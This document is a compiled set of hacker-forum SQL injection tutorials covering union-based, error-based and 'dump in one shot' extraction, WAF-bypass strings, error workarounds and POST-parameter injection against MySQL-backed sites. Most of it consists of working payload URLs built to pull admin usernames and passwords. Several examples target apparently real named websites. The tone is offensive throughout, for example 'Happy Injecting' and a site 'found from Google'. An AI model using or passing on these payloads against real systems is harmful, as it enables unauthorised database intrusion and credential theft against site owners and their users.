Tutorial

SQL Injection- Basics Of SQLi Part-1 By VulnerableLists

SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.

SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .


So Lets Start !
 First Check If  Our target Website is Vulnerable for  SQL Injection . eg
We mostly Use Single Quote  '

https://www.site.com/index.php?id=1'

And we Get  Error . It Means That Site Is Vulnerable For SQL Injection.


SQL Injection- Basics Of SQLi Part-1


Here Some Other Ways To Check Website Vulnerability.

Using Closed Bracket )
https://www.site.com/index.php?id=1)

Using Single Quote '
 https://www.site.com/index.php?id=1'

Using Double Quote "
https://www.site.com/index.php?id=1"

Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.

Here Are Some Basic Comments  .
https://www.site.com/index.php?id=1--

https://www.site.com/index.php?id=1--+

https://www.site.com/index.php?id=1-- -

https://www.site.com/index.php?id=1--+-

https://www.site.com/index.php?id=1%23

https://www.site.com/index.php?id=1;

After Balancing Our Query Lets Count Total Number Of Columns.We Can Count Columns Using  Order By or Group By Statement .


https://www.site.com/index.php?id=1 order By 1--

No Error,
https://www.site.com/index.php?id=1 order by 2--
No Error,

https://www.site.com/index.php?id=1 order by 3--
No error,

https://www.site.com/index.php?id=1 order by 4--

We Got Error .
Unknown column '4' in 'order clause'
It Means Total Number Of Columns Are 3.

it is Integer Based SQL Injection.
But  Some Times We Injecting A Site And Column Count Is 1000 But Nothing Show.eg

https://www.site.com/index.php?id=1 order by 10000--

it means Its String Based SQL Injection. lets Add Single Quote ' in Our Query.

https://www.site.com/index.php?id=1' order by 10000--

and We Got Error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--

Again  Error.Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--

No  Error!! Total Number Of Columns are 3.

In My Next Tutorials We Will Discuss About Finding Vulnerable Columns With Different Techniques And  WAF Bypassing.


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 After Reading my First Tutorial on Basics Of SQL Injection Here is Next Tutorial .

SQL Injection- Basics Of SQLi Part-2 By VulnerableLists


 Mostly When we are Injection a Site we Just Check if  It Gives MySQL Error


But In Some Cases we injecting a site and add single Quote " ' "  to check Vulnerability and execute URL. For Example,
http://www.fakesite.com/detail.php?id=1'

We didn't  Get Any Error But if we Notice there are small Changes in Page .For Example.
Here is the Normal Page of our Target Site.
 http://www.fakesite.com/detail.php?id=1


http://www.fakesite.com/detail.php?id=1'

 After Adding Single Quote " ' " it doesnt  give any kind Of Error But If We Notice The Webpage There Are Some Changes In Page and Some Content is missing.


Now Lets try to Balance Our Query as we Have Learn From Our
First Tutorial   SQL Injection- Basics Of SQLi Part-1

http://www.fakesite.com/detail.php?id=1--
Page Normally Loaded.

Use Order By To Check Total Number of Columns .

http://www.fakesite.com/detail.php?id=1 order by 1--
Page Normally Loaded.

http://www.fakesite.com/detail.php?id=1 order by 3--
Again Page Normally Loaded.

http://www.fakesite.com/detail.php?id=1 order by 5--
And Here We Get some Data missing From Page As Shown In The Above Picture.
Decrease our Columns Count from 5 to 4.

http://www.fakesite.com/detail.php?id=1 order by 4--
Web Page Loaded Normally here It Means Their Are 4 Total Number Of Columns.
 now We have To Prepare Our UNION BASED command.
http://www.fakesite.com/detail.php?id=1 and 0 Union select 1,2,3,4--

And After executing The Query You Can see the Vulnerable Columns Printed on the Web Page.
So For Further injecting like Getting Tables and Columns then Dumping Data
--------------------------------------------
Union Based SQL Injection (WAF Bypassing)


After Our Tutorial on Basics Of SQL Injection.
                                       SQL Injection- Basics Of SQLi Part-1
                                       SQL Injection- Basics Of SQLi Part-2

Union based SQL injection + WAF Bypassing By RAi Jee


Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.


Here Is Our Target .

http://www.targetsite.com/news.php?id=11
Add Single Quote (') at the End Of The URL .

http://www.targetsite.com/news.php?id=11'


And Get MYSQL Error.
Lets Balance Our Query  for Further Injecting.
Some Comments from our Previous Tutorials.

http://www.targetsite.com/news.php?id=11--

http://www.targetsite.com/news.php?id=11--+

http://www.targetsite.com/news.php?id=11-- -

http://www.targetsite.com/news.php?id=11%23

http://www.targetsite.com/news.php?id=11;

Here Is A Small Explanation on Balance and Comment in our Injection.


After Balancing Our Query . Next is Count Total Number Of Columns
http://www.targetsite.com/news.php?id=11 order by 1--+
No Error !
http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!

http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error !

http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error !
Unknown column '6' in 'order clause'

Now Try To Find Our Vulnerable Columns.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.

So Here some WAF Bypassing Methods.
    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!%55NiOn*/ /*!%53eLEct*/
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
    +union+distinct+select+
    +union+distinctROW+select+
 Just Change The Union Select With Following Bypass URLs.

Lets Continue Our Tutorial.
Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.

We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).

Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+


http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.


Here Are Some Variables Of  MYSQL.

@@version                           =  Current Version
@@GLOBAL.VERSION    = Current Version
User()                                   = Current User
Database                              = Current Database

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+

We Can See Current Version Printed on the Page.
 Next Step Is To Get  The Tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+

We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+

we can  see the Column Names on Page . like id,username,pass
to Get The Data From columns here is our final Query.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+


-----------------------------------------------------

Base64 Encode/Decode SQL Injection By VulnerableLists

Today Our Topic is Base64 encoded/decoded SQLi Queries.

Here is A Example of Base64 Parameter.


http://www.FakeSite.com/detail.php?id=MTU=

If we add Single Quote (') where detail.php?id=MTU='
We can see there is no error or any kind of Changes in the Webpage.
We cant inject These Type of Parameters Directly .
SO HOW CAN WE INJECT THESE TYPE OF WEBSITES ???

Lets Start Injecting.
Hmmm  So Here Is our TARGET .
First you Have HACKBAR Addon installed in your Browser.
You Can Installed it From Here .
https://addons.mozilla.org/en-us/firefox/addon/hackbar/

 See Our TARGET detail.php?id=MTU= Parameter is Encoded in Base64

http://www.bio1usa.com/detail.php?id=MTU=

Now Select Base64 Encoded Parameter. Open Hackbar Encoding Option and Select Base64 Decode.

And we get detail.php?id=MTU= Parameter as detail.php?id=15
Now Lets Start Our Manually SQL Injection From Here. add Single Quote (') at The end Of Parameter And Again Encode it Using Hackbar Encoding Option  Base64 Encode and execute URL.

And We Get MYSQL Error !!


Now Next Process is to Count Columns using order/group by . and After this Prepare UNION SELECT Statement for getting Tables and Columns.
Our Injection is Simple . Just what we have to do is.


Base64 decode our parameter
add our SQLi commands to it
then Base64 encode it
and execute the command
These Parts Are BASIC SQL Injection.
Read From My PREVIOUS SQL Injection Tutorials.

                                   SQL Injection- Basics Of SQLi Part-1

                                   SQL Injection- Basics Of SQLi Part-2

                                    Union Based SQL Injection (WAF Bypassing)


----------------------------------------------------------------------------------------


Error Based Injection -Tutorial BY VulnerableLists
After Union Based Injection In this Tutorial You Will Learn Error Based SQL Injection.
How You Will Understand That Our Target WebSite is in Error Based Injection.??
Hmm While we are Injecting Site , And Count Total Number of Columns and Then Build our Union Based SQL Query .


We got 6 Number of Columns. and our UNION BASED Query.

http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -

When we Execute our Union Based Query it doesn't Give us any Vulnerable Column Number Printed on The Webpage or in HTML.
It Gives us A Error Message .

 The used SELECT statements have a different number of columns

Sometimes The TARGET site not Give Any Vulnerable Column Number And Also Not Any Kind of Error . Those Sites Are Also Error Based / Double Query SQL injection .
So We Processed Next With Error Based  Queries.

1st Step is To Get Version.
Here is The Error Based Query To Get The Version.

http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -

and we Will Get The Version Printed on The WebPage.


2nd Step is To Get Database Name.

Now Lets Check the Current Database Name.
A Website can Have More than 2 , 3 or 5 Databases. So We Use LIMIT to get all The  Databases.

LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1

Here is Our Query To Get The  Database.

http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -


3rd Step Is to Get The Tables .
Now We Have To Get The Tables. As We Want Tables From Primary Database .
Here Is The Query For Tables From Primary Database.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
Until You Get Your Desired Table Name .

4th Step Is to Get The Column Names From Our Targeted Table Name.
Now We Have to Get The Column Names From The Table Name.
We Got Table Of Admin.
So Lets Get The Columns From Table Admin .

Here Is The Query For Getting Column Names From The Table Admin.

http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
Here Is that PART in Our Query.

Table_name=ADMIN
Here Is The HEX Value of ADMIN=61646d696e
And Put it With 0x to Build Our Correct Query.

Table_name=0x61646d696e

And Here Is The Query.
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1
until we Get The Column Name Like Username and Password.

5Th Step Is to Extracting Data From Columns .
After We Get The Column names Like Username And Password.
Next Step Is To Extract Data From These Columns.

Here is The Query For Extracting Data from Columns.

http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

WE Put The TABLENAME=Admin
And
Column_name_1=username
Column_name_2=password

So Here is The FINAL QUERY .

http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

And We Get The ADMIN username and Password printed on the  Page.

--------------------------------------------------------------------------------------------------------

Error Based Dump In One Shot (DIOS) - By VulnerableLists

We Have Discussed in Our Previous Tutorial About Error Based SQL Injection.
In This Tutorial You Will Learn How To Build Error Based Dump In Shot ( DIOS ) .
As  We Know That in Error Based Query we Give Our Commands To server and it Gives Us result the Under a error .


If We Want to Get the version() then we Give Query Like this.

http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -

we get the version printed on the page. version=5.5.42-cll

Now Lets get the Primary Database name.
http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
and Here is our Primary Database.

this the Primary Database name "kkbaketo_wordpress" so this is our Primary Database name . if we want to get the other we usually Increase the LIMIT 0,1 to LIMIT 1,1

But we Can Also get all Databases Without Using the LIMIT.
Here Is Our SYNTAX for Getting All Databases.

(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)

Now Add this SYNTAX to Get all Databases.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -

and these our Databases.

information_schema,kkbaketo_wordpress

Next step  is to Get The Tables.
Here is The Example.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
and we Get Table name under Error response ::

We Just GOT one TABLE Name. kkbaketop_category

it Was Our First Table name. we Can Get Next one and Then Another by Increasing the Value of LIMIT 0,1 to LIMIT 2,1 LIMIT 3,1
 We Increase the LIMIT for Tables.
LIMIT 0,1 for 1st table.
LIMIT 1,1 for 2nd tables.
As We Know that we Can DUMP All Tables and Columns In UNION BASED injection.
in ERROR BASED Dump in one Shot ( DIOS ) we can not Dump All Tables/Columns as Like UNION BASED Injection.
But We Can Get some Tables/Columns from The Database by BUILDING our Query.


Here is Our SYNTAX For Tables.

(select group_concat(table_name) from information_schema.tables where table_schema=database())

Now add this SYNTAX in our DIOS Query.

(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)


Our DIOS Query is Ready for  Tables.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)-- -

Here are Our Tables.

kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product

We Can also  HTML TAG to show All Tables in a New Line.
HTML TAG=<BR>
we can use it by encoding it in HEX Value or Putting the Single Quote Before and After the HTML TAG.
HEX Value=3c42523e we have to use 0x before the HEX Value to Use The HTML TAG.
HEX Value=0x3c42523e
Putting Single Quote='<BR>'

PUT The HTML TAG Before The Table_name.
Hmmm now Lets Add this Tag to our Error Based DIOS Query and execute it.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name) from information_schema.tables where table_schema=database())))x)a)-- -

Now All Tables are in NEW line.

Next Step is we Have to Get Columns.

Here Is The SYNTAX for Columns.

(select group_concat(3c42523e,table_name,0x3a,column_name) from information_schema.columns  where table_schema=database())

Add this SYNTAX in DIOS Query and Execute it for Getting Columns from Each Table.

And Here is the FINAL DIOS Query for Error Based Getting Tables And Columns in one SHOT.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database())))x)a)-- -
---------------------------------------------------------------------------------------------------------------


Bypassing illegal Mix of Collations- Tutorial by VulnerableLists

We Will Continue our Tutorials About SQL.
In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.
Lets start with our Regular SQL injection.


Our Target.

http://www.Site.com/detail.php?id=31

First we have to Count How Many Columns it have.

http://www.Site.com/detail.php?id=31 order by 1-- -
No Error !
http://www.Site.com/detail.php?id=31 order by 4-- -

No Error  !
http://www.Site.com/detail.php?id=31 order by 6-- -

We Got Error Here.

Unknown Column '6' in 'order by'


Lets Reduce the Column Count.
http://www.Site.com/detail.php?id=31 order by 5-- -
No Error !

There are 5 Columns so let's Prepare our UNION SELECT Command and Find Vulnerable Columns.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -

We Got 2 and 3.

Lets try to Get The Tables.

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Ooops !! we got Error Here .


Illegal mix of collations for operation 'UNION'

Here Some Methods which we can use to Bypass illegal mix of collations for operation 'UNION'


.1 Using UNCOMPRESS(COMPRESS(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

.2 Using UNHEX(HEX(our_query_here))

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

.3 Using CAST()

http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

.4 Using CONVERT()

 http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -

BYPASSED !!

SOME ADVANCE Methods for CONVERT()
In CONVERT() Function if ascii doesn't work then we can use these Functions instead of ascii.
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
Hope it Will Help you in Future .

-----------------------------------------------
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial

Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted -Tutorial By VulnerableLists

In This Tutorial You Will Learn How To Bypass the Error Allowed Memory Size of XXXX Bytes Exhaustes.

While Injecting we came to site which Gives us The Error Of Allowed Memory Size of XXXX Bytes Exhausted when we BUILD our Union Based Query.
This Error occurs Because of That PHP doesn't Left any allowed Memory.There Are a lots of Possible Causes you can Find on our Chaachu Google.


Hmmm we will start With our normal Injecting.we Found the Site From Google while Injecting and its Vulnerable to SQL Injection..
First we will Count The Total Number of Columns .

http://www.TARGET.com/product.php?id=35 order by 5-- -

No Error !

http://www.TARGET.com/product.php?id=35 order by 6-- -

Again Site loaded Normally and There is No Error !

http://www.TARGET.com/product.php?id=35 order by 7-- -

Now We Have Got A Error here

Unknown column '7' in 'order clause'

it Means There are Total 6 Number of Columns.

Lets Execute our UNION BASED Query.

http://www.TARGET.com/product.php?id=35 and 0 Union SELECT 1,2,3,4,5,6-- -

After executing UNION BASED Query we Got a Error.


Fatal error: Allowed memory size of 536870912 bytes exhausted (tried to allocate 534511572 bytes) in /home/XXXX/public_html/cat_ver_producto.php on line 166


The problem is with the PHP Memory of the Server.We Will use NULL Values instead of putting The Number Columns there to Bypass the Server PHP Memory Usage for our SQL Query.

After Putting NULL values Our Query Will Be.
http://www.TARGET.com/product.php?id=35 and 0 Union SELECT null,null,null,null,null,null-- -

Now The ERROR is GONE!!

As we are using Null Values we Don't know Which Column is Vulnerable. So to find The Vulnerable Column we Give The Command OF Version() one by one in every Column until it Gives us Any Result.
http://www.TARGET.com/product.php?id=35 and 0 Union SELECT version(),null,null,null,null,null-- -
After checking The first Column next Check Another and then Another until we Got The Result.In This Way we Will Check All Columns and Will Find our Vulnerable Column.
When we will Find our Vulnerable Column then we Can put our Query for Tables and Columns in that vulnerable Column.
if You Don't know How To Get Tables And Columns Then.
Read From Union Based SQL Injection Section.

----------------------------------------------------------------------------------------------------------
Bypassing Incorrect usage of UNION and ORDER BY -Tutorial By VulnerableLists
In Previous tutorial we Have Discuss about
Bypassing Error Allowed Memory Size of XXXX Bytes Exhausted
Today's our Topic is how can we Bypass the Incorrect Usage of UNION and ORDER BY .
So Lets start our Manual Injection .Our Target Site is Vulnerable To SQL Injection.

Now Will try to Find the Total number of columns. Hmmm we will use ORDER BY for Counting Columns.
Here is our Query

http://www.FakSite.com/detail.php?id=12 order by 6-- -

We Got ERROR Here !!!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 5-- -,10' at line 1


Lets Decrease our Columns Count from 6 to 3
http://www.FakSite.com/detail.php?id=12 order by 3-- -

Still The Same ERROR !!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3 -- -,10' at line 1

Now Try Only One Column For Order by Command


http://www.FakSite.com/detail.php?id=12 order by 1-- -

We Got The Same Again

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- -,10' at line 1

Again The Same Error as We have Also Put 1 Column for Columns Count.So now We will Try To Guess The Number of Columns by Own.
So We Will Give Command for UNION SELECT Statement with 3 columns.
And Our Query Will be

http://www.FakSite.com/detail.php?id=12 UnION SEleCT 1,2,3-- -

After Executing our Query we Got the Error !!

We Got Error of  "Incorrect usage of UNION and ORDER BY"
hmmm  as you can See here we Cannot inject with UNION SELECT Query.
So we Use Procedure Analyse with Xpath Extractvalue Query to Bypass the Error of Incorrect Usage of UNION and ORDER BY.
Then Here is Query of  Procedure Analyse with Xpath Extractvalue :

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,0x524169204a6565,0x3a,@@version)),1)-- -

BinGOOOO The Error is Gone !!!


And We Got Tables there but we can see only Some Tables name there.
For All Tables we will add substr Function in our Query to Get All Other tables from the database.
http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select substr(group_concat(table_name),10,50) from information_schema.tables where table_schema=database()))),1)-- -

Increase the value of 10,50 in the Query to get other tables in the Database.
Then Next we have to Get the Column names from the our Targeted Table.
Here is Query for Getting Column names

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.tables where table_name='OUR TABLE_NAME HERE'))),1)-- -

and The Last Part is Extracting Data from columns.
Here is The Final Query for Extracting data from Columns

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(OUR_COLUMN_HERE) from OUR_TABLE_NAME_HERE))),1)-- -
-----------------------

Post Parameters Injection Through Live HTTP Headers - Tutorial By RAi Jee
In This Tutorial You Will Learn How to Inject a Website Through Post Parameters with Live HTTP Headers.
First You Need Live HTTP Headers Addon installed in Your Browser if Dont have This
Now Lets Start our Tutorial
Here is The our Target Site There You Can See A Search Box.
Now input Some Text in that Search Box and Open Live HTTP Headers Addon.Then Click on The Search Button to execute the Search command.
After Click on the Search BUTTON now see in the Live HTTP Headers to Find our Post Parameter which We Have input There.
And Our Post Parameter is inputsbox=vulnerablelists&x=11&y=9. Lets Add Single Quote at end of inputsbox=vulnerablelists' to check if its Vulnerable or not.Click on REPLY Option in Live HTTP Headers to execute our Post Parameters Commands.

Now we Can see Our Target is Vulnerable To SQL injection. Now Will Execute our String Based ORDER BY command For Finding Total Number of Columns there.we add our Commands inputsbox=vulnerablelists' order by 15-- -
After Executing command of  inputsbox=vulnerablelists ORDER BY 7-- -&x=11&y=9 we didn't get any result there and also not any kind of error.and After Executing 8 Columns in Order By Statement it Gives Mysql Error .It means There are 7 Total Number of Columns.
We have got 3,1 are Vulnerable Columns There .Lets Add our Query For Finding Version.

Now Let's Execute Of UNION SELECT command For Finding Vulnerable Columns.

You Can see the Version Printed there.
For Getting Tables and Columns and then Extracting DATA from the Tables::

---------------------

Adding HTML Tags in SQL Queries - Tutorial by RAi Jee
HTML Tags can be used For a lot of Fun in SQL Queries . We Can use HTML Tags to Make Color full Result in Output.Sometimes we are injecting A site and The Vulnerable Columns is in Title or in Source Page so we Can also Use HTML Tags There to Show Output on The Page.
So We Will Start Adding HTML Tags For making Output Some Color Full.
Here is a example. We wanna Print The version in RED Color So Here is our HTML TAG for Showing the Version in RED Color .
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

lets See the  Result.Before Executing The Query First Encode HTML TAG in Hex Value or Use Single Quote Before and After The HTML Tag To Make it Executable

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+

And You can See the Version is in RED color. if we Wanna use Diffirent Colors for Each Command Like Displaying Version in RED Color ,Database in Green Color,User in Blue Color so will use Different HTML Tags for each Tasks.
See Example .
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>
So Our Final Query For Displaying Each task in Different color Will be,
Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())
See Example.
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+

And See the picture all Tasks Are complete .In this way You Can Also Display Tables and Columns in different Colors.
After Displaying SQLi Commands in Different Colors .
Now Let's See how Can We Display Data When our Vulnerable Column is in Source Page or in TiTLE  Using HTML TAGS.
When Vulnerable Column is in Source Page.
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)
so we will use this HTML TAG for Displaying Data on the Page if Our Vulnerable Columns is in Source page.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>)

and sometimes our Vulnerable Column is in Title so in that case we will use this HTML Tag to Print Data on the Webpage

HTML TAG:Concat(</title>,Version())

use these HTML Tags after encoding in Hex Value or PUT Single Quote before and after the HTML Tag to make the Query Executable.
Happy Injecting !!
-----------------------------------------

After A long Time i'm Back With Another Tutorial on SQL Injection.In this Tutorial we will Discuss about Converting Syntax in Hex Value.Many Of Noobs Like me Dont know The usage of Hex Value.
Some Times In Our Regular Manually Injecting we came To such Sites where we cant Get Data from Our SQLi Command.

For Example we gave Command for Printing Our Name on the Web Page.
so we Will Normally Add Name in the Vulnerable Column Enclosed By Single Quotes ' Before and After the Name.

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat('RAi Jee'),3,4-- -

When we Execute This Command Sometimes This Doesn't Work .Actually this Shit Happen because of Some Sites WAF's have Blocked The Usage of Single Magic Quotes .
So in Such cases we have to deal with it by Converting Our Syntax in HEX value.
we can Convert Our Syntax in Hex with HACKBAR .But Here is a online Website which also Convert our Syntax in HEX Value.
Link:www.asciitohex.com

Our Syntax:RAi Jee
Hex Value:524169204a6565
we have to Use 0x Before our HEX Value to make it Executable.
https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(0x524169204a6565),3,4-- -

We can do the Same in for other Purpose where Single Quotes Doesn't Work .

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name='ADMIN'-- -
If it Doesn't  work Then we will Encode our Syntax in Hex Value.

0x 41444d494e  (HEX_VALUE_OF_ADMIN)

https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name=0x41444d494e-- -

 We can Also Encode Our  HTML TAGS to HEX Value whenever SINGLE Quote Doesn't Exist.
--------------------------------


In this Tutorial I'm Going To Discuss On How many There are Ways for Counting All Columns At one Request.Simply we use ORDER BY Command For Counting Columns One By One and It take Time But All The Time we are looking for Easy Ways.So This Guide Will Help You In That Case.
I will Tell You Guys Some Best Ways Which Will Help you in Counting Columns.

METHOD 1
Using GROUP BY
This Method Is Known To  Some people But I'm going To Cover it also For Newbies.
This Method Is Very Simple. We Have To Build Our GROUP BY Command For Counting Columns At One Request.We will Give a large Numbered Values with GROUP BY and When we Execute Our Command it will Return Total Columns.

For Example,
http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +
And this Command Will Return Total Number Of Columns.

